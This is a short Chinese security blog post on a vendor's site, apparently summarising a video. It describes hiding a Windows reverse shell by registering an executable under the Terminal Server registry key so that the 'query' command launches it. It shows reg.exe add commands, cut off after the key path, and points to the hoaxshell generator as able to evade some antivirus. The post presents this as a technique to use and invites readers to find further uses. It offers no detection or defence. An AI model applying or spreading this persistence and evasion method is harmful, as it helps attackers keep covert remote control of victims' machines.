长亭百川云 - 文章详情

一条命令来隐藏反向Shell

关注安全技术

54

2024-07-13

From:https://www.youtube.com/watch?v=gzv3d7rvjKA

注册表路径:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal

包含了与终端服务器相关的设置和配置信息。

执行命令query可以查看服务器的一些状态,实际上是执行此项值中的可执行文件。

添加一条,打开计算器。

reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal

这里再介绍一个能够绕过一些AV的Windows反向shell生成器和交互程序。(测试环境用的X绒,可以绕过,经测试不能绕过Windows Defender的AMSI)。

https://github.com/t3l3machus/hoaxshell

将命令写入一个bat脚本中,然后添加注册表后执行。

reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal

只需执行命令query heresec即可运行反弹shell脚本。

还能怎么用,再联想一下。

相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2